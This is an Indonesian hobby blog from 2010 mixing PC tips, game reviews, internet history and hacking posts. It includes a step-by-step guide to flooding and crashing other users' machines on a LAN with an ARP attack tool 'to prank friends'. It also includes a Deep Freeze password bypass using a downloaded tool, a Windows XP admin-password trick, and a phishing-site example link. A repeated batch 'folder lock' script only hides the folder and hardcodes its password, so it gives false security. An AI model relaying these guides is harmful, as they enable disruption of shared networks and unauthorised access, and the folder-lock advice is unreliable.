www.tokomarlan.com

Jumat, 31 Desember 2010

Mengunci folder tanpa Software


Hi...Temen2, kali Ini saya akan berbagi tips Mengunci folder tanpa Software,Tips ini Mungkinn Bisa membantu teman2 apabila Ingin menyimpan folder atau data supaya lebih aman,atau lainnnya,
dari pada kita download software pengunci kita bikin sendiri aja ok., tapi inget jangan disalah gunakan trik ini...ok.
nah caranya pertama , bikin NEW TEXT DOCUMENT di notepad nya tau kan
kemudian
isi dengan :



@ECHO OFF
titipan kunci folder
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Serius nich mau Kunci ??(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Foldernya dah terkunci
goto End
:UNLOCK
echo Eiittt masukkan pasword dulu
set/p "pass=>"
if NOT %pass%== oktri goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Foldernya berhasil di buat
goto End
:End

setelah itu SAVE AS dengan nama kunci.bat

NAh SELESAI
sekarang
kita klik kunci.bat nya
tar muncul folder : locker
taruh file2 kamu di sana
kemudian kalo dah selese
tinggal klik kunci.bat lageee

mau buka???
tinggal klik kunci.bat lagi abis itu masukkan pasword : oktri

Sejarah Point Blank

POINT BLANK

Point Blank

Apa Itu Point Blank ?
* Point Blank adalah sebuah Online First Person Shooting Game dengan tingkat realistik tinggi.
* Didalam game FPS Point Blank terdapat dua macam kubu, yaitu CT-Force (Counter Terrorist) dan Free Rebels (Terrorist).
* Didalam game FPS Point Blank terdapat dua macam tampilan charackter, yaitu Male (pria)dan Female (Wanita) .

Story
* CT Force (Counter Terrorist)
- Akibat konflik dengan imigran yang semakin meluas, pemerintah memutuskan dibentuk suatu organisasi khusus untuk menghadapi para teroris, terpilih 30 pasukan elit dalam melaksanakan misi ini.
Sejak dibentuknya organisasi ini, mencari informasi dan keberadaan dari organisasi teroris yang dinamakan Free Rebles. Sejalan dengan meningkatnya ancaman teroris dari organisasi Free Rebels, pemerintah kemudian mengirimkan bantuan pasukan terbaik yang pernah ada di pemerintahan yang kemudian datang dan bergabung dan berganti nama menjadi CT-FORCE (Counter Terrorist Force).
* Free Rebels (Terrorist)
- Semakin bertambahnya imigran yang tidak mendapatkan pekerjaan dan terusir dari masyarakat, sehingga untuk bertahan hidup para imigran kemudian melakukan berbagai macam tindak kriminal dari perampokan hingga pengedaran obat-obatan terlarang.
Aksi kriminal ini berkembang menjadi gerakan yang teroganisir hingga terbentuk organisasi yang dinamakan Free Rebels. Tujuannya tidak lain untuk menguasai seluruh perdagangan obat terlarang dan senjata di seluruh dunia serta menciptakan rasa takut bagi masyarakat.

Gameplay
* Terdapat sistem pangkat, dimana kita harus menyelesaikan misi/level untuk mengejar pangkat tersebut.
* Terdapat 4 sistem permainan mode, yaitu Deathmatch, Bomb Mission, A.I dan Eliminate.
- Deathmatch Mode : Mode permainan yang dimana kita harus membunuh musuh yang sudah ditentukan scorenya, misalkan room master menyetting permainan mode 100 kill dan waktu 3 menit, maka jika waktu habis permainan selesai atau jika sudah membunuh 100 kill maka permainan selesai.
- A.I Mode : Mode Permainan dimana kita seteam atau personal mengalahkan BOT/Komputer. Biasanya A.I Mode digunakan untuk latihan, agar skill kita dapat berkembang.
- Bomb Mission Mode : Mode Permainan yang dimana kita harus memasang bomb [Free Rebels], dan dimana kita juga harus mendefuse bomb [CT Force]. Di dalam Bomb Mission untuk mendefuse bomb pencet E.

Graphics
* Graphic permainan Point Blank, ada enaknya dan ada tidak enaknya.
- Graphics untuk CT Force : 95 % sangat gampang dikenali oleh musuh diberbagai map. hanya di map stormtube saja CT Force dapat bersembunyi.
- Graphics untuk Free Rebels : kebalikan CT Force 95 % susah dikenali oleh musuh, kenapa ? sebab dengan baju warnanya free rebels dapat bersembunyi sehingga susah dilihat oleh musuh.
- Graphics Senjata : untuk graphics senjata 50 % Bagus dan 50 % Tidak Bagus, Mengapa ? sebab kenapa saya katakan 50% bagus dan 50 % tidak bagus ? karena 50% untuk Bagus adalah warna - warna dan jenis senjata di game Point Blank sangatlah oke, enak dilihat. dan 50% Tidak Bagus karena dengan warnanya yang mencolok seperti Ak-47 G. Musuh dapat mengenali kita dengan cepatnya.

Sound
* Sound yang terdapat di dalam team mode sangatlah seru untuk didengarkan, apalagi apabila ada yang memakai charackter Female, Dengan sound sebutan "OH YEAH!" 1 Team dapat ketawa ketiwi .

Community
* Terdapat fitur CLAN, Friendlist, Dan Chat Mode.
- Untuk Chat Mode dibagi menjadi 3 : Public, Clan, Dan Friendlist.
- Untuk Friendlist biasanya menggunakan sistem Whisper atau /w.
- Untuk CLAN sangat berguna sekali apabila ada CW atau Clan War.

Customer Service
* Kurang flexibel atau kurang nyaman bagi player Point Blank yang bermain di Warnet, Terkadang ada warnet yang tidak mengizinkan untuk browsing sehingga player point blank tidak dapat ke forum gemscool untuk melakukan customer service.


Spesifikasi Komputer
* CPU Pentium4 2.4 Ghz atau Athlon 2500+.
* Memory Ram 512 MB.
* VGA 128 MB.
* Koneksi Internet yang cepat.

The Good
Adanya Lv Rank, Fitur Clan, Friendlist, Dan Pangkat.
* Lebih Menarik Daripada Game FPS yang dulu sempat menjadi nomor 1, sekarang kalah sama game Point Blank.
* Banyaknya Event Yang diselenggarakan oleh Gemscool.
* Grafis yang mendekati realistis dan mendetil.

The Bad
* Seringnya Maintanance.
* Masih Banyak BUG yang terdapat di Game Point Blank.
* Room Master (RM) membuat kecewa pemain apabila si RM LAG.

Sejarah Internet dan Perkembangan Internet


sejarah internet

Internet merupakan jaringan komputer yang dibentuk oleh Departemen Pertahanan Amerika Serikat di tahun 1969, melalui proyek ARPA yang disebut ARPANET (Advanced Research Project Agency Network), di mana mereka mendemonstrasikan bagaimana dengan hardware dan software komputer yang berbasis UNIX, kita bisa melakukan komunikasi dalam jarak yang tidak terhingga melalui saluran telepon. Proyek ARPANET merancang bentuk jaringan, kehandalan, seberapa besar informasi dapat dipindahkan, dan akhirnya semua standar yang mereka tentukan menjadi cikal bakal pembangunan protokol baru yang sekarang dikenal sebagai TCP/IP (Transmission Control Protocol/Internet Protocol).

Tujuan awal dibangunnya proyek itu adalah untuk keperluan militer. Pada saat itu Departemen Pertahanan Amerika Serikat (US Department of Defense) membuat sistem jaringan komputer yang tersebar dengan menghubungkan komputer di daerah-daerah vital untuk mengatasi masalah bila terjadi serangan nuklir dan untuk menghindari terjadinya informasi terpusat, yang apabila terjadi perang dapat mudah dihancurkan.
Pada mulanya ARPANET hanya menghubungkan 4 situs saja yaitu Stanford Research Institute, University of California, Santa Barbara, University of Utah, di mana mereka membentuk satu jaringan terpadu di tahun 1969, dan secara umum ARPANET diperkenalkan pada bulan Oktober 1972. Tidak lama kemudian proyek ini berkembang pesat di seluruh daerah, dan semua universitas di negara tersebut ingin bergabung, sehingga membuat ARPANET kesulitan untuk mengaturnya.
Oleh sebab itu ARPANET dipecah manjadi dua, yaitu "MILNET" untuk keperluan militer dan "ARPANET" baru yang lebih kecil untuk keperluan non-militer seperti, universitas-universitas. Gabungan kedua jaringan akhirnya dikenal dengan nama DARPA Internet, yang kemudian disederhanakan menjadi Internet.

 Daftar kejadian penting

Tahun Kejadian
1957 Uni Soviet (sekarang Rusia) meluncurkan wahana luar angkasa, Sputnik.
1958 Sebagai buntut dari "kekalahan" Amerika Serikat dalam meluncurkan wahana luar angkasa, dibentuklah sebuah badan di dalam Departemen Pertahanan Amerika Serikat, Advanced Research Projects Agency (ARPA), yang bertujuan agar Amerika Serikat mampu meningkatkan ilmu pengetahuan dan teknologi negara tersebut. Salah satu sasarannya adalah teknologi komputer.
1962 J.C.R. Licklider menulis sebuah tulisan mengenai sebuah visi di mana komputer-komputer dapat saling dihubungkan antara satu dengan lainnya secara global agar setiap komputer tersebut mampu menawarkan akses terhadap program dan juga data. Di tahun ini juga RAND Corporation memulai riset terhadap ide ini (jaringan komputer terdistribusi), yang ditujukan untuk tujuan militer.
Awal 1960-an Teori mengenai packet-switching dapat diimplementasikan dalam dunia nyata.
Pertengahan 1960-an ARPA mengembangkan ARPANET untuk mempromosikan "Cooperative Networking of Time-sharing Computers", dengan hanya empat buah host komputer yang dapat dihubungkan hingga tahun 1969, yakni Stanford Research Institute, University of California, Los Angeles, University of California, Santa Barbara, dan University of Utah.
1965 Istilah "Hypertext" dikeluarkan oleh Ted Nelson.
1968 Jaringan Tymnet dibuat.
1971 Anggota jaringan ARPANET bertambah menjadi 23 buah node komputer, yang terdiri atas komputer-komputer untuk riset milik pemerintah Amerika Serikat dan universitas.
1972 Sebuah kelompok kerja yang disebut dengan International Network Working Group (INWG) dibuat untuk meningkatkan teknologi jaringan komputer dan juga membuat standar-standar untuk jaringan komputer, termasuk di antaranya adalah Internet. Pembicara pertama dari organisasi ini adalah Vint Cerf, yang kemudian disebut sebagai "Bapak Internet"
1972-1974 Beberapa layanan basis data komersial seperti Dialog, SDC Orbit, Lexis, The New York Times DataBank, dan lainnya, mendaftarkan dirinya ke ARPANET melalui jaringan dial-up.
1973 ARPANET ke luar Amerika Serikat: pada tahun ini, anggota ARPANET bertambah lagi dengan masuknya beberapa universitas di luar Amerika Serikat yakni University College of London dari Inggris dan Royal Radar Establishment di Norwegia.
1974 Vint Cerf dan Bob Kahn mempublikasikan spesifikasi detail protokol Transmission Control Protocol (TCP) dalam artikel "A Protocol for Packet Network Interconnection".
1974 Bolt, Beranet & Newman (BBN), pontraktor untuk ARPANET, membuka sebuah versi komersial dari ARPANET yang mereka sebut sebagai Telenet, yang merupakan layanan paket data publik pertama.
1977 Sudah ada 111 buah komputer yang telah terhubung ke ARPANET.
1978 Protokol TCP dipecah menjadi dua bagian, yakni Transmission Control Protocol dan Internet Protocol (TCP/IP).
1979 Grup diskusi Usenet pertama dibuat oleh Tom Truscott, Jim Ellis dan Steve Bellovin, alumni dari Duke University dan University of North Carolina Amerika Serikat. Setelah itu, penggunaan Usenet pun meningkat secara drastis.
Di tahun ini pula, emoticon diusulkan oleh Kevin McKenzie.
Awal 1980-an Komputer pribadi (PC) mewabah, dan menjadi bagian dari banyak hidup manusia.
Tahun ini tercatat ARPANET telah memiliki anggota hingga 213 host yang terhubung.
Layanan BITNET (Because It's Time Network) dimulai, dengan menyediakan layanan e-mail, mailing list, dan juga File Transfer Protocol (FTP).
CSNET (Computer Science Network) pun dibangun pada tahun ini oleh para ilmuwan dan pakar pada bidang ilmu komputer dari Purdue University, University of Washington, RAND Corporation, dan BBN, dengan dukungan dari National Science Foundation (NSF). Jaringan ini menyediakan layanan e-mail dan beberapa layanan lainnya kepada para ilmuwan tersebut tanpa harus mengakses ARPANET.
1982 Istilah "Internet" pertama kali digunakan, dan TCP/IP diadopsi sebagai protokol universal untuk jaringan tersebut.
Name server mulai dikembangkan, sehingga mengizinkan para pengguna agar dapat terhubung kepada sebuah host tanpa harus mengetahui jalur pasti menuju host tersebut.
Tahun ini tercatat ada lebih dari 1000 buah host yang tergabung ke Internet.
1986 Diperkenalkan sistem nama domain, yang sekarang dikenal dengan DNS(Domain Name System)yang berfungsi untuk menyeragamkan sistem pemberian nama alamat di jaringan komputer.




Sumber : http://id.wikipedia.org/wiki/Sejarah_Internet

Blogger benar-benar tau apa yang di inginkan para pelanggannya. Sekarang blogger menambahkan fitur upload image untuk background blog anda. Fitur ini terletak di "Templates Designer". Jika ingin menggunakan fitur ini anda harus menggunakan templates terbaru blogger dari "templates designer". 
Untuk menjalankan fitur ini anda harus login ke blog anda, lalu masuk ke tab design lalu klik lagi tab Templates Designer lalu pilih tab Background. Klik Background Image lalu klik Upload Image lalu klik browse untuk memilih gambar yang ingin di jadikan background dari komputer anda. 
Tunggu beberapa saat ketika gambar di upload, jika sudah selesai akan di dapat hasil seperti di atas. Perlu di ketahui bahwa ukuran maksimal untuk gambar adalah 300KB
(The good)
(The bad)
Sekian  posting dari saya, semoga bermanfaat terima kasih
sumber gambar (http://buzz.blogger.com/)

Cara Menjebol Password Administrator Windows XP

Mungkin anda pernah mengalami “syndrome password”, istilah saya untuk orang yang memiliki banyak password tapi punya ingatan yang lemah sehingga sering mengalami kesusahan dalam melakukan log in karena lupa passwordnya apa.

Apabila dalam hal ini anda lupa password administrator XP ada beberapa cara yang bisa dilakukan untuk menjebol password. Salah satunya adalah dengan metode “save mode”.

Tapi ingat sebelum anda mempraktekkannya, yakinkan bahwa ini bukan untuk niat jahat ingin mengorek informasi dari komputer orang lain tetapi untuk mengantisipasi apabila anda lupa passwordnya.

Cara : Nyalakan komputer anda (he.. he...)

1. Hidupkan kompimu (bahasa gaulnya = komputer)
2. Jika sudah, tekan F8. Maka kamu akan di bawa ke mode "safe mode" tunggu beberapa menit
3. Tekan Ctrl + alt + Del Maka akan muncul form Login dan Password
4. Isi login dengan Administrator serta passwordnya terserah anda pokoknya passwordnya mudah di ingat oleh anda sendiri
5. Jika telah melakukan hal di atas, restart kembali komputer anda
6. Pilihlah start in normaly windows kalo ngga salah heheheh
7. Tekan kembali Ctrl + Alt + Del
8. Ketikkan nama loginnya Administrator terus password yang baru anda ubah tadi
9. Lihat apa yang terjadi, anda telah menjadi administrator di Kompi anda
10. Selesai......terserah anda mau lakukan apasaja

Tips mengunci folder tanpa software


Hi...Temen2, kali Ini saya akan berbagi tips Mengunci folder tanpa Software,Tips ini Mungkinn Bisa membantu teman2 apabila Ingin menyimpan folder atau data supaya lebih aman,atau lainnnya,
dari pada kita download software pengunci kita bikin sendiri aja ok., tapi inget jangan disalah gunakan trik ini...ok.
nah caranya pertama , bikin NEW TEXT DOCUMENT di notepad nya tau kan
kemudian
isi dengan :



@ECHO OFF
titipan kunci folder
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Serius nich mau Kunci ??(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Foldernya dah terkunci
goto End
:UNLOCK
echo Eiittt masukkan pasword dulu
set/p "pass=>"
if NOT %pass%== oktri goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Foldernya berhasil di buat
goto End
:End

setelah itu SAVE AS dengan nama kunci.bat

NAh SELESAI
sekarang
kita klik kunci.bat nya
tar muncul folder : locker
taruh file2 kamu di sana
kemudian kalo dah selese
tinggal klik kunci.bat lageee

mau buka???
tinggal klik kunci.bat lagi abis itu masukkan pasword : oktri

10 TOOL FAVORIT HACKER

1.Nessus
“Nessus” pertama kali dibuat oleh Renaud Deraison pada tahun 1998 dan disebarkan untuk komunitas internet secara bebas, bermanfaat, ter-update dengan baik serta mudah untuk digunakan.
Nessus adalah sebuah program untuk mencari kelemahan pada sebuah sistem komputer. Menurut situs resminya di www.nessus.org, tool ini telah digunakan oleh lebih dari 75.000 organisasi dan perusahaan di seluruh dunia.
2.Snort
Snort adalah sebuah IDS, yaitu tool untuk mencegah dan mendeteksi serangan terhadap sistem komputer. Vendor dari snort mengklaim bahwa tool ini telah didownload berjuta-juta kali dari situs mereka. Anda mungkin berminat untuk mencobanya, silahkan download tool ini di www.snort.org.
3.Kismet
Kismet adalah sebuah tool untuk mendeteksi koneksi wireless(mendukung lalu lintas 802.11b, 802.11a, dan 802.11g ) , menangkap paket dalam sebuah sistem jaringan dan menjadi sebuah IDS (intrusion detection System).
Untuk mencari tahu lebih lanjut mengenai kismet, anda dapat mengunjungi situs http://www.kismetwireless.net atau masuk ke #kismet irc.freenode.net.
4.Metasploit Framework
Metasploit Framework adalah sebuah proyek open source untuk mengembangkan, menguji dan menggunakan kode eksploit. Dibuat dengan bahasa Perl sebagai fondasi dasar dan dan terdiri dari komponen pelengkap yang telah dicompile dengan bahasa C, assembler dan Python. Metasploit Framework dapat berjalan pada sistem operasi UNIX, Linux dan Windows. Keterangan yang lebih detail dapat anda cari di http://www.metasploit.com.
5.Netcat
Netcat adalah sebuah tool networking utility yang dapat membaca dan menulis data pada koneksi sebuah jaringan melalui protokol TCP/IP.
Fitur yang terdapat pada Netcat antara lain :
  • Koneksi keluar dan masuk melalui protokol UDP ataupun TCP dengan port yang digunakan..
  • Tunneling mode, tunneling dari UDP ke TCP, memetakan parameter dalam jaringan (source port/interface, listening port/interface, dan mengijinkan remote host melakukan koneksi ke tunnel)
  • Port scanner, untuk mendeteksi port yang terbuka.
  • Buffered send-mode dan hexdump RFC854 telnet.
6.Hping
Hping merupakan sebuah tool serba guna. Tool ini dapat digunakan untuk menguji kemampuan firewall, mencari port yang terbuka, menguji keamanan jaringan dengan menggunakan berbagai jenis protokol, mendapatkan informasi sistem operasi, mengevaluasi protokol TCP/IP.
7.TCPDump
Tcpdump juga merupakan sebuah sniffer. Admin jaringan menggunakan tool ini untuk memonitor lalu lintas dan menganalisa permasalahan jika terjadi gangguan. Menurut informasi di http://www-iepm.slac.stanford.edu/monitoring/passive/tcpdump.html , Tcpdump menggunakan paket filter dari UNIX BSD untuk meng-capture data(BPF / BSD Packet Filter).BPF menerima salinan dari driver pengirim dan penerima paket.Pengguna tcpdump juga dapat menyaring paket sesuai dengan keinginan.
8. John The Ripper
Sebuah password cracker dari jaman nenek moyang para hacker yang masih menjadi 10 besar tool favorit. Berikut adalah keterangan dari pembuat John The Ripper.
John the Ripper is a password cracker, currently available for UNIX, DOS,WinNT/Win95. Its primary purpose is to detect weak UNIX passwords. It has been tested with Linux x86/Alpha/SPARC, FreeBSD x86, OpenBSD x86, Solaris 2.x SPARC and x86, Digital UNIX, AIX, HP-UX, and IRIX”.
9. Cain And Abel
Cain & Abel adalah sebuah tool untuk masalah password. Tool ini dapat mengumpulkanpassword dengan metode network sniffing, meng-crack password menggunakan Dictionary attack, Brute-Force and Cryptanalysis attacks, merekam pembicaraan VoIP (Voice Over Internet Protocol), meng-crack jaringan wireless, menganalisa trafik dalam jaringan. www.oxid.it
10. WireShark / Ethereal
Wireshark / Ethereal adalah sebuah tool untuk menganalisa protokol jaringan. Fungsinya juga sebagai sebuah sniffer. Memantau lalu lintas internet. Wireshark
dapat berjalan pada Windows, MAC OS X, dan Linux. www.wireshark.org
Tertarik? Pelajari dan pahami saja cara penggunaan 10 tool tsb. Kita memang tdk akan semudah itu menjadi hacker hebat hanya dengan mengandalkan 10 tool diatas. Tapi tool2 tsb sudah diakui oleh semua tingkatan Hacker. Kan bisa menjadi tambahan bagi anda2 yang ingin menggeluti sekuriti komputer secara mendalam.

Mengatasi Lupa Password Deep Freeze

Deep Freeze bisa sangat membantu kita dalam hal keamanan suatu komputer, tapi bisa saja juga sangat merepotkan bila kita lupa password Deep Freeze tersebut padahal kita ingin menginstal suatu aplikasi atau program kedalam komputer. karena Lupa passwordnya maka yang terjadi adalah?.... hehe...
untuk mengatasi lupa password tersebut Anda tidak perlu bingung, kebetulan kemaren saya sempet googling di mbah google dan cara ini lebih mudah dari pada cara sebelumnya yang saya postingkan..



yaitu menggunakan software yang bernama ADF (Anti Deep Freeze) anda bisa googling di google...atau bisa langsung Download Disini
cara penggunaanya cukup mudah berikut langkah-langkahnya..
1. Download software ADF (Anti Deep Freeze)
2. Extact File tersebut sehingga menghasilkan 2 buah file yaitu Anti Deep Freeze.png dan ADF 0.1.exe
3. Untuk mematikan Deep Freeze yang lupa passwordnya anda Klik 2 pada ADF 0.1.exe
Sehingga akan tampil seperti gambar dibawah ini..


Dan pada taksbar akan tampil kepala Panda baru seperti gambar


4. Beri centang pada pilihan Select your version sesuai dengan versi Deep Freeze anda..
5. Klik 2 kali kepala panda baru diikuti dengan menekan tombol Shift (Shift+Klik2x)


6. Biarkan kolom password kosong kemudian pilih OK.
7. Untuk mengganti password yang lama dengan password baru pilih tab password dan pada Change Password masukkan password baru..



8. Untuk melihat hasilnya Pilih Appl and Reboot…


Semoga membantu…

Cara Sembunyikan Drive di Komputer

Kali Ini saya akan berbagi tips Menyembunyikan Drive pada komputer,Untuk sudah Profesional mungkin berfikir Tips Ini nggak bermutu.dan sudah jadul ,tp nggak apa apa yang penting dapat berbagi , bagi kita yang selum tahu ataupun sudah lupa.Untuk yang Jika Anda berniat untuk menyembunyikan drive (C,D,E, dan sebagainya) di komputer, maka mungkin trik berikut ini dapat membantu Anda :

  1. Pilih Start->Run->ketikkan cmd->OK
  2. Ketika diskpart, tekan Enter
  3. Ketik list volume untuk menentukan drive mana yang akan disembunyikan, pilih enter
  4. Misalkan drive yang dipilih ada adalah drive D, maka pilih volume 3, dan tekan Enter
  5. Ketik remove letter D, tekan Enter, dan pilih Exit untuk keluar dari diskpart
  6. Hasilnya bisa dicek di Windows Explorer, atau bisa di-restart dulu.
  7. Untuk mengembalikan drive ke posisi semula, dapat melakukan langkah 1-4, dan kemudian ketik assign letter D
Untuk cara lainnya yang juga mudah dilakukan dengan menggunakan gpedit (group policy editor) :
  1. Pilih Start->Run->ketik gpedit.msc, pilih OK
  2. Klik double User Configuration-> Administrative Templates -> Windows Components -> Windows Explorer->lihat di jendela sebelah kanan, pilih enable di Hide specified drives in My Computer, lalu tentukan drive yang akan disembunyikan
  3. Misalnya disini yang akan disembunyikan adalah drive D, maka pilih Restrict D drive only, pilih Apply dan OK
  4. Hasilnya bisa dilihat di Windows Explorer
  5. Untuk mengembalikan ke posisi semula, bisa melakukan langkah seperti di atas, lalu pada jendela Hide specified drives in My Computer pilih opsi Not Configured, pilih Apple dan OK
http://www.oktri.co.cc/2010/04/tips-sembunyikan-drive-di-komputer.html

Cara membobol akun Facebook orang lain

Hacker semakin meresahkan facebook saja.Karena akhir-akhir ini banyak orang yang membicarakan atau bahkan ingin mencoba sesuatu yang disebut hacking Saya akan bahas sedikit tentang cara membobol facebook orang lain. para facebooker tidak ada salahnya kita mengetahui gimana sih para hacker facebook bekerja

1. Dengan cara Phising / FakeLogin.

cara ini di buat di era jejaring Friendster dan MySpace masih berjaya. Cara ini cukup efektif dilancarkan oleh pencuri password, biasanya si calon korban adalah para netters yang nyubi, atau kita pun bisa masuk perangkap mereka jika kita lengah. indikasinya: biasanya mereka mengirimkan pesan melalui email yang isinya ajakan atau tawaran untuk menambahkan daftar teman mereka, lalu mereka memberikan link dan membawa kita untuk login ke akun kita… disinilah mereka bekerja, tampilan halaman depan dibuat sedemikian rupa sehingga mirip dengan situs aslinya,
sebagai contoh buka link ini.. jangan lupa sebelum masuk biasanya ada WARNING “situs ini telah dilaporkan sebagai pemalsuan web” klik abaikan saja jika ingin melihat
jika anda login di halaman tersebut, maka semua data anda akan masuk ke database si pencuri password.
kalo sudah gini kan bisa repot kita..nah sekarang gimana cana antisipasinya??
Caranya sih cukup simpel,
- Pastikan anda Login di www.facebook.com [kalo alamat FB ada tambahan sesuatu, itu berarti situs palsu misal http://www.airdata.nl/libraries/tcpdf/config/lang/facebook/index.html]
-Jangan bagikan alamat email anda pada sembarang orang yang tidak anda kenal.[biasanya sih orang2 yang gabung di grup cara cepat dapat teman sering menyertakan alamat email]
-Jangan pernah berfikir untuk membobol FB orang dengan cara download software facebook hacker, karena jika anda ingin menggunakannya anda harus login dan menuliskan alamat email dan password, terbukti malah paswword anda yang akan di hacked.
2. Dengan cara KeyLoger
Bagi anda pengguna jasa Warnet untuk melakukan aktifitas browsing ato mungkin buka facebook, anda harus berhati hati dengan para hacker yang menggunakan Keyloger untuk mencuri pasword anda. cara ini sudah di buat sebelum jejaring Friendster dan MySpace masih berdiri. dulunya sih dibuat untuk memperbaiki jika ada kerusakan pada sistem.
Cara ini cukup efektif dilancarkan oleh pencuri password, biasanya si hacker menginstall di komputer warnet, calon korban adalah semua pengguna PC yang sudah terinstal keyloger tidak terkecuali kita pun bisa masuk perangkap mereka jika kita lengah.
ini adalah contoh software KeyLoger

cara mengatasinya sih pernah di bahas di tips facebook aman. tapi akan saya bahas lagi deh,,

KeyLoger
adalah pencatatan setiap kali tombol pada keyboard di tekan.
contoh: sAya beLajar hAck Facebook 360 hAri 12 deTik *
tulisan di atas akan tercatat di keyloger seperti dibawah ini:
s [shift] a y a [space] b e [shift] l a j a r [space] h [shift] a c k [space] [shift] f a c e b o o k [space] 3 6 0 [space] h [shift] a r i [space] 1 2 [space] d e [shift] t i k [space] [shift] 8
memang agak ribet sih bacanya, namun para hacker sudah punya cara cepat untuk mengkonfersi bahasa key loger..
Dengan demikian, walau kita menggunakan password kombinasi angka huruf dan karakter, tetap saja dengan keyloger akan tercatat semua aktifitas pada keyboard. anda bisa mendownloadnya disini
Antisipasi dengan cara:
-jika anda memiliki flashdisk anda bisa tulis alamat email pada notepad, copy-paste jika ingin login [anda tidak akan melakukan aktifitas pengetikan pada user name ato email dan sebagainya]
jika perlu dengan paswordnya juga.
-jika pasword adalah angka silahkan anda buka aplikasi kalkulator pada windows, bisa di jadikan sebagai virtual key. gunakan dengan cara klik pada angka, kemudian copast pada bagian password.
-ataw anda gunakan virtual key yang disediakan pada operating system komputer dengan cara:
Klick start >> kemudian All Program >> kemudian accessories >> kemudian accesbility >> kemudian On-screen keyboard
nanti akan muncul seperti ini:

kemudian anda buka notepad
Klick start >> kemudian All Program >> kemudian accessories >> kemudian pilih Notepad
setelah anda membuka notepad silahkan klik pada virtual kerboard sesuai dengan alamat email anda, setiap klik akan muncul pada notepad, jika sudah selesai tekan [ctrl]+[a] lalu [ctrl]+[c] kemudian anda pastekan pada halaman facebook dengan menekan [ctrl]+[v] ingat pada www.facebook.com
lakukan hal yang sama pada password anda
dengan demikian anda tidak melakukan aktifitas pada keyboard
3. Hack Facebook dengan Facebook Freezer
cara ini hanya dilakukan oleh orang yang iseng saja, FacebookFreezer bekerja agar akun yang di Freez tidak bisa masuk ke akunnya..
softwarenya seperti ini:
indikasi anda adalah korban FacebookFreezer adalah anda tidak bisa masuk walaupun anda sudah benar memasukan email dan password
caranya mengatasinya cukup mudah,
a. Ketika Anda memasukkan alamat email dan password akun Facebook Anda yang sedang di-freeze seseorang, maka kemudian akan muncul pesan sbb (klik untuk memperbesar):
b. Selanjutnya segeralah Anda klik tulisan yang berwarna merah, dan muncul pesan sbb (klik untuk memperbesar):
Pesan di atas memberitahukan Anda bahwa untuk mengganti password Anda, Anda diminta untuk melakukan klik “Atur Ulang Kata Sandi”, agar sebuah alamat email konfirmasi dari pihak facebook terkirim ke email Anda.
c. Buka email Anda kemudian baca petunjuknya kemudian klik link yang diberikan, seperti berikut (klik untuk memperbesar):
d. Setelah Anda menuju link yang diberikan, masukkan kata sandi Anda yang baru. Jreeennggg!!! akhirnya Anda dapat masuk kembali di halaman akun facebook Anda bersama teman-teman jaringan Anda.
4. Dengan software Facebook Account hacker
Cara ini sangat kejam..

cara mengatasinya sudah saya bahas di artikel sebelumnya
catatan:
* Segera sembunyikan alamat email anda
* Hindari Password menggunakan tanggal lahir anda atau yang berkaitan dengan anda
* Bedakan password antara login dan email
* Jangan lupa berdoa sebelum ber facebook ria

Counter Strike 1.6 free download

Counter Strike is known to be one of the most popular PC games of all time. Personally I’ve not played this game but have seen many of my friends playing this for hours. Excellent graphics, sounds, visualizations, different stages made this game popular among game lovers. You can play this game as a single user and can also play with multi players. This action game has been released in different versions like Counter Strike Zero Condition, 1.6 Multi user game play etc. You can download Counter Strike 1.6 full game from Softpedia and start playing. Full version of this game is sized just about 380 MB.
counter strike 1.6 full game
counter strike 1.6 full game

Download Counter Strike 1.6 Full Game

tools ngerjain teman di lan pakai arpwin attacker

tools buat ngisengin temen di lan.toolsnya yaitu bernama arpwin attacker(kalo gak salah) !download dulu klik disini
. nanti berisi 2 file ,file 1 bernama arp.exe,1 lagi WinPcap_4_0_1.exe!tools ini dapat mengacaukan jaringan lan , membuat crash aplikasi,dll.langkah pertama install dulu file yang bernama WinPcap_4_0_1.exe(yang satunya tadi) , setelah itu instal ARPnya.udah masuk ke aplikasinya dah.
lalu klik scan untuk melihat ip yang lain (cecklist yang pengen di errorin ,server biasanya ke detect tapi jangan ip anda sendiri yang di ceklist).
untuk memulai aksi klik icon arp attack pilih sendiri ngerjainnya ada flood,bangateway,ip conflict,dll.untuk mengatur waktunya klik options>attack>atur sendiri waktunya. pada bagian bawah biasanya akan diberi tahu statusnya(bukan fb).anda bisa mempelajarinya sendiri.saya bukan memberitahu kepada anda cara-cara yang buruk dan bodoh , tetapi saya hanya ingin agar anda waspada dan mempelajari cara mencegahannya bisa menghiden ip atau atur koneksi,apabila dalam lab komputer praktik anda bisa mencopot kabel utp lan.untuk toolnya anda bisa download klik disini

CMD

sedikit code prompt command/cmd/dos
saya dapet program-programnya dari browsing
ADDUSERS - Memasukkan/ menambah user ke/dari file CSV.
ARP - Address Resolution Protocol
ASSOC Change - file extension associations
ASSOCIAT - One step file association
AT Schedule - Perintah untuk membuat shedule program (utk dijalankan kemudian waktu)
ATTRIB - Mengganti atribut file
BOOTCFG - Edit boot setting windows
